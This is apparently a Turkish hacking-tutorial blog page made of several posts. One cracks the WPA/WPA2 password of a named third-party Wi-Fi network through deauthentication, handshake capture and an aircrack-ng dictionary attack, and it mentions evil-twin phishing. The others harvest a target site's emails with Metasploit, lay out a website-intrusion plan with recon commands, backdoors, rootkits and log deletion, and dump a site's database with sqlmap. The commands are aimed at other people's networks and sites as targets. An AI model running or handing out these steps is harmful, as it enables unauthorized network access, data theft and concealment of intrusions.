ABONE OL

KALİ LİNUX EĞİTİM

ARKADAŞ SAĞOLSUN YARDIM EDİYOR BİZLERE

Bugün İse Sizlere Yine Kali Linux Üzerinde Şifreleme Türü Wpa Wpa2 Olan Wireless Ağlarinin Şifresini Kirmayi Göstericem (Elimden Geldiği Kadariyla).
Her Ne Kadar Karmaşik İçinden Çıkılmaz Gibi Görünsede Buradaki Adimlari Tek Tek Uyguladiğinizda Aslında Ne Kadar Basit Oldugunu Anlayacaksiniz 



İlk Olarak Kali Linux'da Terminalimizi Açıyoruz. 1. Adim : "airmon-ng "
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


2. Adim : "airmon-ng start wlan0 " İle Ağ Kartimizi Aktif Hale Getiriyoruz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


3. Adim : " airodump-ng --encrypt wpa mon0 " Bu Komutumuz İle Handshake Yakalamaya Bi Adim Atmiş Bulunuyoruz.
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


4. Adim : Buradan Kendimize Sinyal Gücü İyi Olan Bi Hedef Seçiyoruz Bssid Adresini Ve CH (Yayin Yaptiği Kanal Numarasi) Aliyoruz. Bizim Hedefimiz SUPERONLINE_Wi-Fi_4002 (: Bssid : 18:28:61.3F:69:0F CH : 11

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


5. Adim : " airodump-ng -w wpahack --encrypt wpa -c 11 --bssid 18:28:61:3F:69:0F mon0 " Buradaki "Wpahack" Olusacak Cap. Dosyamizin Adi Bunu Değiştirebilirsiniz Modem İsmi Yada Herhangi Bişi Yazabilirsiniz.

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


6. Adim : Hedef Ağımiza Bağli Bir Bilgisayarin Bilgilerini (Station) Aldiktan Sonra.. Yeni Konsol Açip :

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


7. Adim : Yeni Konsolda " aireplay-ng -0 0 -a (bssid) -c (station) mon0 " Bssid Yazan Yere Modemin Mac Adresini Station Kismina İse Ağa Bağlı Olan Bilgisayarin Mac Adresini Yaziyoruz. Resimde Gözükyor. Bu Komut İle Hedef Ağımıza Bağlı Olan Clienti -0 0 (DeAuth)Komutu İle Ağdan Düşmesi İçin Sonsuz Bir Döngü Yaratiyoruz. Resimdeki Gibi Hata Alirsaniz Sonuna --ignore Ekleyiniz.

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


8. Adim : Yukarida Gördüğümüz Gibi Hedefteki Ağa Bağlı Bilgisayari Ağdan Düşürüp Tekrar Bağlanmasini Bekledik Ve Handshake Yakalama Olayimiz Gerçekleşti. Yani Bunun Mantiği Şöyle Ağdaki Bilgisayarin Bağlantisini Kesip Tekrar Bağlanmasini Sağliyor Ve Bizde Bu Sirada Hanshake Yakalamiş Oluyoruz.

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


9. Adim : Evet Handshakemizi Yakaladik. Yakaladiğimiz Handshake Başlangıç Klasöründe Bi Bakalim Duruyor Mu [/COLOR]

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


10. Adim : Şimdi Geçelim Sözlük Saldirimiza. Yeni Terminal Açiyoruz; " aircrack-ng -w /root/Destkop/pass.txt wpahack-01.cap " yaziyoruz, Ve Şifre Kirma İşlemimiz Başlıyor Wordlistiniz Ne Kadar Sağlam (Harf Rakam Özel Karakter gibi)Olursa Kirma İşlemimiz Kisa Sürede Bitecektir. Wordlistiniz Yok İse Buradaki Konumu İnceliyerek Wordlist Hazirliyabilirsiniz.

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


Ve Key Found : aaaaabbbbb

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


Şifremizi Kontrol Edelim Bağlanicakmi 

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.


Faydali Olmasi Dileğimle ... 

Wordlistle Uğraşmak İstemeyen WPS Yada Linset (Evil Twin Attack) Açıklarını Deneyebilir. Linsetin Mantıgıda Söyle Hedef Ağı Klonluyor Baglantısını Kesıyor Sizin Klonladıgınız Ağa Bağlanmasını Sağlıyor Giriş Yaptıgında Şifresi Ekranınıza Düşüyor. İlgili Konu : Linset Wifi Hack WifiSlax Üzerinde Kullanıldı Linset Dilerseniz Kali Linux Üzerindede Kurup Kullanabilirsiniz.

Emeğe Saygı Teşekkürler Butonuna Basmak Zor Değil.





kali linux eğitim siteye mail çekmek:
[B]Merhaba Kali Linux Yeni Başlayan Arkadaşlarımız İçin Site Mail Çekmeyi Öğreticem
Ilk Önce Kali Linux Açıp Uçbirim Çalıştırıyoruz
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

İlk Komutumuzu Yaziyoruz: msfconsole
İlk Komut Yazdıktan Sonra Biraz Bekliyoruz
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
 

Daha Sonra Diger Komutu Giriyoruzuse auxiliary/gather/search_email_collector
Yazip Enter Diyoruz
Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

Bu Komutu Giriyoruz: show options

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.

En Önemli Yerine Geldik Şimdi Bu Komutu Yaziyoruz : set DOMAIN hedefsite.com

Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
[B]


[/
    
online intertor cyber

    






Kali Linux ile Hedef Website Hack.Merhaba arkadaşlar kali linux ile website nasıl hacklenir sorularına cevap olur umarım.

Yararlı olması için HER İNCE DETAYI İLE okuyunuz.
Başlıyoruz...

Öncelikle kendimize bir senaryo çizmemiz lazım. Bu yol üzerinde gideceğiz.


Sızma Testleri Senaryosu
----------------------------------
1- Bilgi Toplama : Bu aşamada sitenin hangi dil ile yazıldığı (php,html vb.) hangi veritabanına sahip olduğu (mysql vb.) öğrenilir.
2- Ağ Haritalama : Ağın haritasını , Ağdaki çalışan bilgisayarları ve onların işletim sistemleri öğrenilir.
3- Zayıflık Tarama : Sistemin açıklarını (bug)'larını tarama.
4- Sisteme Sızma "Exploit çalıştırmak"
5- Yetki Yükseltme
6- Başka Ağlara Sızma
7- Erişimleri Koruma
8- İzleri Temizleme
9- Raporlama


Bu aşamalar için kullanılacak araçlar , programlar:
1- Bilgi Toplama
------------------------

Araç 1 - Arama Motoru
Açıklama:
Sisteme ait Google’a düşmüş urlleri belirlemeye çalışır.
Kullanımı:

Kod:
site:hedef.com filetype:php
site:hedef.com filetype:asp
site:hedef.com filetype:aspx
site:hedef.com filetype:php admin
site:hedef.com filetype:php login
Araç 2 – Whois Bilgileri
Açıklama:
Whois bilgileri ile kayıt tarihi, admin iletişim bilgileri, ns bilgileri, dns bilgileri vb. bilgileri içermektedir.
Kullanımı:

Kod:
# whois hedef.com
Araç 3 – Nslookup
Açıklama:
Nslookup ile domain ip aralığını araştırır.
Kullanımı:

Kod:
# nslookup hedef.com
Araç 4 – Dnsenum
Açıklama:
Hedef sunucu veya site dnsleri hakkında bilgi verir.
Kullanımı:

Kod:
# dnsenum –dnsserver hedef.com
Araç 5 – Webshag
Açıklama:
Hedef sunucu veya sitede port tarar servislerini görüntüler ve url dizin tarayabilir. Port tarama ve servis belirlemede Nmap aracını kullanır.
Kullanımı : Bu Kali Linux Tools ile birlikte gelir... Açmak için

Kod:
“Application” – “Kali Linux” – “Web Applications” – “Web Vulnerability Scanners” – “webshag-gui”
Araç 6 – WhatWeb
Açıklama:
Hedef site hazır bir script kullanıyorsa script adını ve sürümü hakkında bilgi verir.
Kullanımı:

Kod:
# whatweb hedef.com
# whatweb –a 3 hedef.com
Araç 7 – wafW00f
Açıklama:
Hedef sitede veya sunucuda güvenlik duvarı algılama aracı. IDS/IPS araştırıcı.
Kullanımı:

Kod:
# wafw00f http://hedef.com
Araç 8 – Fierce
Açıklama:
Alt domainlerin bulunması için kullanılır.
Kullanımı:

Kod:
# fierce –dnsserver http://hedef.com –range –file /root/sonuc.txt
Araç 9 – TheHarvester
Açıklama:
Subdomain e-posta adreslerinin bulunmasında kullanılır.
Kullanımı:

Kod:
# theharvester –d http://hedef.com –l 1000 –b google
Araç 10 – Dmitry
Açıklama:
Hedef sunucu veya site hakkında bilgi verir.
Kullanımı:

Kod:
# Dmitry –i –w –n –s –e –p –f –b –t 0-9 http://hedef.com
Araç 11 – URLCrayz
Açıklama:
Sitenin alternatif alan adlarını belirler.
Kullanımı:

Kod:
# urlcrayz –k QWERTY -r http://hedef.com
Araç 12 – Maltego
Açıklama:
Gelişmiş ve kapsamlı bilgi toplama aracı.
Kullanımı:

Kod:
“Applications” – “Kali Linux” – “Top 10 Security Tools” – “maltego” gui arayüz programı.
Araç 13 – DirBuster
Açıklama:
Site klasörlerini dizinlerini bulmaya yarar. Wordlist veya brute force ataklarıysa tarama yapabilir.
Kullanımı:

Kod:
“Applications” – “Kali Linux” – “Web Applications” – “Web Crawlers” – “dirbuster” gui arayüz programı.
Araç 14 - Dirb
Açıklama:
Site klasörlerini dizinlerini bulmaya yarar. Wordlist veya brute force ataklarıysa tarama yapabilir.
Kullanımı:

Kod:
# dirb http://192.168.1.2/ /usr/share/sqlmap/txt/smalldict.txt
Araç 15 - Hash - Identifier
Açıklama:
Hashlı olan şifrenin/parolanın şifreleme türünü belirler.
Kullanımı:

Kod:
# “Applications” – “Kali Linux” – “Password Attacks” – “Offline Attacks” – “hash-identifier” konsol aracı.
2- Ağ Haritalama
---------------------------

Araç 1 – Tcptraceroute
Açıklama:
Hedef sisteme giden yol haritasını çıkarır.
Kullanımı:

Kod:
# tcptraceroute http://hedef.com 80
Araç 2 - Nmap
Açıklama:
Nmap taranan ağın haritasını çıkarabilir, ağ makinalarındaki çalışan servisleri, işletim sistemini, portların durumlarını, güvenlik duvarlarını belirleyebilir ve zafiyet taraması yapabilen bir araçtır.
Kullanımı:

Kod:
# nmap –sS 192.168.1.2 –O –vv
# nmap –A –vv 192.168.1.2
–sS parametresi SYN SCAN taraması yapar.
-A, OS ve versiyon bulma, script taraması ve traceroute özelliğini çalıştırır.
-O parametresi işletim sistemi belirler.
-vv parametresi ise çıktıyı sadeleştirir.
Ve bir çok parametre ile tarama işlemi mevcuttur.
Araç 3 – wafW00f
Açıklama:
Hedef sitede veya sunucuda güvenlik duvarı algılama aracı. IDS/IPS araştırıcı.
Kullanımı:

Kod:
# wafw00f http://hedef.com
3- Zayıflık Tarama
------------------

Araç 1 – Nessus
_
Araç 2 – w3af
_
Araç 3 – OWASP Zap
_
Araç 4 – uniscan
Kullanımı:

Kod:
# uniscan –u http:/192.168.1.2/ -qweds
Araç 5 – VEGA

4- Sisteme Sızma "Exploit çalıştırmak"
---------------------------------------

Araç 1 – m.e.t.a.sploit

Araç 2 – Sqlmap

Araç 3 – Fimap


5- Yetki Yükseltme
-------------------

Bu adımda sistemdeki kullanıcının haklarını yetkilerini yükseltmek hedeflenmektedir. Sistemdeki kullanıcıların, haklarının belirlenmesi ve parolasız hesapların belirlenmesi, parolaya sahip hesapların ise araçlarla parolaların kırılması gerekir. Tüm sistemi kontrol edebilmek için (root, administrator veya system) olmak gerekir.

6- Başka Ağlara Sızma
---------------------------

Erişim sahibi olduğumuz sistemde yetki elde etmişsek, başka şifreli kullanıcıların bilgilerini almak için sızdığımız sistemde sniffer çalıştırabilir ve kullanıcı/sistem bilgilerini elde edebilir mümkünse rhost, ssh dosyalarına, eski komutlara bakarak nerelere erişilebiliyor bakılabilir.

7- Erişimleri Koruma
------------------------

Sisteme girdiğimizi başkaları tarafından fark edilmemesi için önlemler almalıyız varsa log programlarının verileri silinmesi, giriş loglarının silinmesi, çalıştırdığımız programların, servislerin saklı olması gerek veya uzaktan erişim sağlamak için backdoor, rootkit yerleştirilebilir ve daha sonra tekrar bağlanılabilir ama bu işlem biraz riskli olabilir.

8- İzleri Temizleme
-----------------------

Hedef sistemde bıraktığımız backdoor, rootkit, keylogger, trojan, scriptler, eklenmiş veriler notlar vb.. işlemler test bitiminde silinmelidir.

9- Raporlama
------------------

Her adımı kayıt altında tutmak bilgi ve notlar almak teknik detayları eklemek test bitiminde güvenliği sağlamlaştırmak açısından faydalı olacaktır ve başka bir pentest çalışmalarınızda tekrar fayda sağlayacaktır.





Kali Linux || Sqlmap


Linux


Merhaba arkadaşlar. Bugün sizlere sqlmap´i tam ayrıntılarıyla anlatmadan, sadece sql injection kısmını anlatacağım. Dilerseniz başlayalım. Ben bu uygulamayı Kali Linux üzerinden göstereceğim. 

Öncelikle Applications > Kali Linux > Top 10 Security Tools > Sqlmap veya Terminal > Sqlmap yollarından biri ile arayüzümüzü açalım. Hedef sitemizde Sql Açığının olması gerekiyor. Bu açığın olup olmadığını Acunetix veya Linux için Powerfuzzer ile öğrenebilirsiniz. Daha sonra bu kodu yazalım: (Ekran Resmi: http://i.hizliresim.com/PY1nD8.png )
Kod: sqlmap -u www.hedefsite.com --dbs

Bu kod ile hedef sitenin databasesini çekmiş olacağız. Bu adımdan sonra Database´nin alt dallarını, yani Tables´ı çekmemiz lazım. Sıradaki kodumuz:
Kod: sqlmap -u www.hedefsite.com -D (database) --tables

Bu kod ile hedef sitenin Tables kısmını öğrenmiş olacağız. "(database)" kısmına çıkan en uygun database´nin adını yazacağız. Daha sonraki kodumuz, sütunlar, yani Columns´ları öğrenmemizi sağlayacak. 
Kod: sqlmap -u www.hedefsite.com -D (database) -T (table) --columns

"(table)" kısmına önceki adımda karşımıza çıkan en uygun Table´ın adını yazacağız. Bir sonraki kodumuz ile karşımıza çıkan en uygun Column´un adını (column) halinde göstereceğim. Şimdiki kodumuz:
Kod: sqlmap -u www.hedefsite.com -D (database) -T (table) -C (column) --dump

--dump komutu, sitedeki verileri çekmemizi sağlar. Bu adımları uyguladıktan sonra SQL Injection işlemimiz tamamlanmış olacaktır. Bir teşekkürü çok görmeyin anlatım tamamiyle bana aittir 




Hiç yorum yok:

Yorum Gönder

burası hacker eğitim yeri oyun yeri değil